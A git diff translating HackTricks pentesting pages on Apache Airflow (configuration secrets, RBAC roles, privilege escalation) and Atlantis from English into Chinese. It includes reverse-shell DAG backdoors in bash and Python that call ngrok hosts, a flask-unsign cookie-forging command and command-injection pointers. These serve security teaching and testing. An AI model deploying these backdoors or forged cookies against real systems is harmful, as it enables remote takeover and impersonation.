Minikube -One easy way to **run apache airflo**w is to run it **with minikube**: - +一种简单的方法是 **使用 minikube 运行 apache airflow**: ```bash helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update @@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow # Use this command to delete it helm delete airflow-release ``` +### Airflow 配置 -### Airflow Configuration - -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: +Airflow 可能在其配置中存储 **敏感信息**,或者您可能会发现存在弱配置: {{#ref}} airflow-configuration.md @@ -38,65 +36,62 @@ airflow-configuration.md ### Airflow RBAC -Before start attacking Airflow you should understand **how permissions work**: +在攻击 Airflow 之前,您应该了解 **权限是如何工作的**: {{#ref}} airflow-rbac.md {{#endref}} -### Attacks +### 攻击 -#### Web Console Enumeration +#### Web 控制台枚举 -If you have **access to the web console** you might be able to access some or all of the following information: +如果您有 **访问 web 控制台** 的权限,您可能能够访问以下一些或全部信息: -- **Variables** (Custom sensitive information might be stored here) -- **Connections** (Custom sensitive information might be stored here) - - Access them in `http:///connection/list/` -- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -- List **users & roles** -- **Code of each DAG** (which might contain interesting info) +- **变量**(自定义敏感信息可能存储在这里) +- **连接**(自定义敏感信息可能存储在这里) +- 在 `http:///connection/list/` 中访问它们 +- [**配置**](./#airflow-configuration)(敏感信息如 **`secret_key`** 和密码可能存储在这里) +- 列出 **用户和角色** +- **每个 DAG 的代码**(可能包含有趣的信息) -#### Retrieve Variables Values +#### 检索变量值 -Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ -Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. +变量可以存储在 Airflow 中,以便 **DAG** 可以 **访问** 其值。这类似于其他平台的秘密。如果您有 **足够的权限**,可以在 `http:///variable/list/` 的 GUI 中访问它们。\ +Airflow 默认会在 GUI 中显示变量的值,但是,根据 [**这个**](https://marclamberti.com/blog/variables-with-apache-airflow/),可以设置一个 **变量列表**,其 **值** 将在 **GUI** 中显示为 **星号**。 ![](<../../images/image (164).png>) -However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ -To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ -Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: +然而,这些 **值** 仍然可以通过 **CLI**(您需要有数据库访问权限)、**任意 DAG** 执行、**API** 访问变量端点(API 需要被激活),甚至 **GUI 本身** 来 **检索**!\ +要从 GUI 访问这些值,只需 **选择您想访问的变量**,然后 **点击操作 -> 导出**。\ +另一种方法是对 **隐藏值** 执行 **暴力破解**,使用 **搜索过滤** 直到您获得它: ![](<../../images/image (152).png>) -#### Privilege Escalation - -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. +#### 权限提升 +如果 **`expose_config`** 配置设置为 **True**,则从 **用户角色** 及 **以上** 可以 **读取** **web 中的配置**。在此配置中,**`secret_key`** 出现,这意味着任何拥有此有效密钥的用户都可以 **创建自己的签名 cookie 来冒充任何其他用户帐户**。 ```bash flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" ``` +#### DAG 后门 (Airflow worker 中的 RCE) -#### DAG Backdoor (RCE in Airflow worker) - -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - +如果您对 **DAG 保存的位置** 有 **写入权限**,您可以 **创建一个** 发送 **反向 shell** 的 **DAG**。\ +请注意,这个反向 shell 将在 **airflow worker 容器** 内执行: ```python import pendulum from airflow import DAG from airflow.operators.bash import BashOperator with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_bash', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) +run = BashOperator( +task_id='run', +bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', +) ``` ```python @@ -105,75 +100,66 @@ from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) +run = PythonOperator( +task_id='rs_python', +python_callable=rs, +op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} +) ``` - #### DAG Backdoor (RCE in Airflow scheduler) -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. - +如果您将某些内容设置为**在代码的根目录中执行**,在撰写本文时,它将在将其放入DAG文件夹后几秒钟内**由调度程序执行**。 ```python import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") rs("2.tcp.ngrok.io", 14403) with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python2', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} +run = PythonOperator( +task_id='rs_python2', +python_callable=rs, +op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} ``` +#### DAG 创建 -#### DAG Creation +如果你成功地**攻陷了 DAG 集群中的一台机器**,你可以在 `dags/` 文件夹中创建新的 **DAG 脚本**,它们将会在 DAG 集群中的其余机器上**复制**。 -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. +#### DAG 代码注入 -#### DAG Code Injection +当你从 GUI 执行一个 DAG 时,你可以**传递参数**给它。\ +因此,如果 DAG 编写不当,它可能会**容易受到命令注入的攻击。**\ +这就是在这个 CVE 中发生的情况:[https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) -When you execute a DAG from the GUI you can **pass arguments** to it.\ -Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\ -That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) - -All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**. - -Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**: +你需要知道的**开始寻找 DAG 中命令注入的方法**是**参数**是通过代码**`dag_run.conf.get("param_name")`**来**访问**的。 +此外,**变量**也可能出现相同的漏洞(请注意,拥有足够权限的情况下,你可以在 GUI 中**控制变量的值**)。变量通过以下方式**访问**: ```python from airflow.models import Variable [...] foo = Variable.get("foo") ``` - -If they are used for example inside a a bash command, you could perform a command injection. +如果它们例如在 bash 命令中使用,您可能会执行命令注入。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md index 5fd8e486b..413dab94b 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md @@ -4,112 +4,102 @@ ## Configuration File -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** +**Apache Airflow** 在所有的 airflow 机器上生成一个 **config file**,称为 **`airflow.cfg`**,位于 airflow 用户的主目录中。此配置文件包含配置信息,并且 **可能包含有趣和敏感的信息。** -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** +**访问此文件有两种方式:通过攻陷某个 airflow 机器,或访问 web 控制台。** -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. +请注意,**配置文件中的值** **可能不是实际使用的值**,因为您可以通过设置环境变量如 `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` 来覆盖它们。 -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. +如果您可以访问 **web 服务器中的配置文件**,您可以在同一页面上检查 **实际运行的配置**。\ +如果您有 **访问 airflow 环境中某台机器的权限**,请检查 **环境**。 -Some interesting values to check when reading the config file: +在阅读配置文件时,一些有趣的值: ### \[api] -- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - - `airflow.api.auth.backend.basic_auth`: For **basic authentication** - - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - - You can also **create you own authentication** method with python. -- **`google_key_path`:** Path to the **GCP service account key** +- **`access_control_allow_headers`**: 这表示 **CORS** 的 **允许** **头部** +- **`access_control_allow_methods`**: 这表示 **CORS** 的 **允许方法** +- **`access_control_allow_origins`**: 这表示 **CORS** 的 **允许来源** +- **`auth_backend`**: [**根据文档**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) 可以配置一些选项来决定谁可以访问 API: +- `airflow.api.auth.backend.deny_all`: **默认情况下没有人** 可以访问 API +- `airflow.api.auth.backend.default`: **每个人都可以** 无需认证地访问 +- `airflow.api.auth.backend.kerberos_auth`: 配置 **kerberos 认证** +- `airflow.api.auth.backend.basic_auth`: 用于 **基本认证** +- `airflow.composer.api.backend.composer_auth`: 使用 composer 认证 (GCP) (来自 [**这里**](https://cloud.google.com/composer/docs/access-airflow-api))。 +- `composer_auth_user_registration_role`: 这表示 **composer 用户** 在 **airflow** 中将获得的 **角色**(默认是 **Op**)。 +- 您还可以使用 Python **创建自己的认证** 方法。 +- **`google_key_path`:** GCP 服务账户密钥的路径 ### **\[atlas]** -- **`password`**: Atlas password -- **`username`**: Atlas username +- **`password`**: Atlas 密码 +- **`username`**: Atlas 用户名 ### \[celery] -- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -- **`result_backend`**: Postgres url which may contain **credentials**. -- **`ssl_cacert`**: Path to the cacert -- **`ssl_cert`**: Path to the cert -- **`ssl_key`**: Path to the key +- **`flower_basic_auth`** : 凭证 (_user1:password1,user2:password2_) +- **`result_backend`**: 可能包含 **凭证** 的 Postgres URL。 +- **`ssl_cacert`**: cacert 的路径 +- **`ssl_cert`**: 证书的路径 +- **`ssl_key`**: 密钥的路径 ### \[core] -- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -- **`fernet_key`**: Key to store encrypted variables (symmetric) -- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -- **`security`**: What security module to use (for example kerberos) +- **`dag_discovery_safe_mode`**: 默认启用。在发现 DAG 时,忽略任何不包含字符串 `DAG` 和 `airflow` 的文件。 +- **`fernet_key`**: 用于存储加密变量的密钥(对称) +- **`hide_sensitive_var_conn_fields`**: 默认启用,隐藏连接的敏感信息。 +- **`security`**: 使用哪个安全模块(例如 kerberos) ### \[dask] -- **`tls_ca`**: Path to ca -- **`tls_cert`**: Part to the cert -- **`tls_key`**: Part to the tls key +- **`tls_ca`**: ca 的路径 +- **`tls_cert`**: 证书的路径 +- **`tls_key`**: tls 密钥的路径 ### \[kerberos] -- **`ccache`**: Path to ccache file -- **`forwardable`**: Enabled by default +- **`ccache`**: ccache 文件的路径 +- **`forwardable`**: 默认启用 ### \[logging] -- **`google_key_path`**: Path to GCP JSON creds. +- **`google_key_path`**: GCP JSON 凭证的路径。 ### \[secrets] -- **`backend`**: Full class name of secrets backend to enable -- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. +- **`backend`**: 要启用的 secrets 后端的完整类名 +- **`backend_kwargs`**: backend_kwargs 参数被加载到字典中并传递给 secrets 后端类的 **init**。 ### \[smtp] -- **`smtp_password`**: SMTP password -- **`smtp_user`**: SMTP user +- **`smtp_password`**: SMTP 密码 +- **`smtp_user`**: SMTP 用户 ### \[webserver] -- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -- **`cookie_secure`**: Set **secure flag** on the the session cookie -- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible +- **`cookie_samesite`**: 默认是 **Lax**,因此它已经是可能的最弱值 +- **`cookie_secure`**: 在会话 cookie 上设置 **secure flag** +- **`expose_config`**: 默认是 False,如果为 true,**config** 可以从 web **console** 中 **读取** +- **`expose_stacktrace`**: 默认是 True,它将显示 **python tracebacks**(对攻击者可能有用) +- **`secret_key`**: 这是 **flask 用于签署 cookies 的密钥**(如果您拥有此密钥,您可以 **冒充 Airflow 中的任何用户**) +- **`web_server_ssl_cert`**: **SSL** **证书** 的 **路径** +- **`web_server_ssl_key`**: **SSL** **密钥** 的 **路径** +- **`x_frame_enabled`**: 默认是 **True**,因此默认情况下不可能发生点击劫持 ### Web Authentication -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - +默认情况下,**web authentication** 在文件 **`webserver_config.py`** 中指定,并配置为 ```bash AUTH_TYPE = AUTH_DB ``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - +这意味着**身份验证是针对数据库进行检查的**。然而,还有其他配置是可能的,例如 ```bash AUTH_TYPE = AUTH_OAUTH ``` +将**身份验证委托给第三方服务**。 -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - +然而,还有一个选项可以**允许匿名用户访问**,将以下参数设置为**所需角色**: ```bash AUTH_ROLE_PUBLIC = 'Admin' ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 7ff782327..fd5a2b9f5 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -4,44 +4,40 @@ ## RBAC -(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. +(来自文档)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow 默认提供了一 **组角色**: **Admin**, **User**, **Op**, **Viewer**, 和 **Public**. **只有 `Admin`** 用户可以 **配置/更改其他角色的权限**. 但不建议 `Admin` 用户以任何方式更改这些默认角色,删除或添加这些角色的权限。 -- **`Admin`** users have all possible permissions. -- **`Public`** users (anonymous) don’t have any permissions. -- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -- **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** 用户拥有所有可能的权限。 +- **`Public`** 用户(匿名)没有任何权限。 +- **`Viewer`** 用户拥有有限的查看权限(仅可读)。它 **无法查看配置**。 +- **`User`** 用户拥有 `Viewer` 权限以及额外的用户权限,允许他管理 DAG。 他 **可以查看配置文件**。 +- **`Op`** 用户拥有 `User` 权限以及额外的操作权限。 -Note that **admin** users can **create more roles** with more **granular permissions**. +请注意,**admin** 用户可以 **创建更多角色**,并赋予更 **细粒度的权限**。 -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. +还要注意,唯一具有 **列出用户和角色权限的默认角色是 Admin,连 Op** 都无法做到这一点。 -### Default Permissions +### 默认权限 -These are the default permissions per default role: +以下是每个默认角色的默认权限: - **Admin** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] +\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 Roles 上读取,可以在 Permissions 上读取,可以在 Roles 上删除,可以在 Roles 上编辑,可以在 Roles 上创建,可以在 Users 上读取,可以在 Users 上创建,可以在 Users 上编辑,可以在 Users 上删除,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除,可以在 Task Reschedules 上读取,菜单访问 Task Reschedules,可以在 Triggers 上读取,菜单访问 Triggers,可以在 Passwords 上读取,可以在 Passwords 上编辑,菜单访问 List Users,菜单访问 Security,菜单访问 List Roles,可以在 User Stats Chart 上读取,菜单访问 User's Statistics,菜单访问 Base Permissions,可以在 View Menus 上读取,菜单访问 Views/Menus,可以在 Permission Views 上读取,菜单访问 Permission on Views/Menus,可以在 MenuApi 上获取,菜单访问 Providers,可以在 XComs 上创建] - **Op** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] +\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除] - **User** -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] +\[可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除] - **Viewer** -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] +\[可以在 DAGs 上读取,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances] - **Public** \[] {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md index a4b35140f..551a30a82 100644 --- a/src/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md @@ -4,109 +4,109 @@ ### Basic Information -Atlantis basically helps you to to run terraform from Pull Requests from your git server. +Atlantis 基本上帮助你从 git 服务器的 Pull Requests 运行 terraform。 ![](<../images/image (161).png>) ### Local Lab -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 +1. 前往 **atlantis releases page** 在 [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) 并 **下载** 适合你的版本。 +2. 创建一个 **个人令牌**(具有 repo 访问权限)你的 **github** 用户 +3. 执行 `./atlantis testdrive`,它将创建一个你可以用来 **与 atlantis 交互的 demo repo** +1. 你可以在 127.0.0.1:4141 访问网页 ### Atlantis Access #### Git Server Credentials -**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. +**Atlantis** 支持多个 git 主机,如 **Github**、**Gitlab**、**Bitbucket** 和 **Azure DevOps**。\ +然而,为了访问这些平台上的 repos 并执行操作,它需要一些 **特权访问权限**(至少写权限)。\ +[**文档**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) 鼓励在这些平台上为 Atlantis 创建一个用户,但有些人可能会使用个人账户。 > [!WARNING] -> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. +> 在任何情况下,从攻击者的角度来看,**Atlantis 账户**将是一个非常 **有趣的** **目标**。 #### Webhooks -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. +Atlantis 可选地使用 [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) 来验证它从你的 Git 主机接收到的 **webhooks** 是否是 **合法的**。 -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. +确认这一点的一种方法是 **仅允许来自 Git 主机的 IP 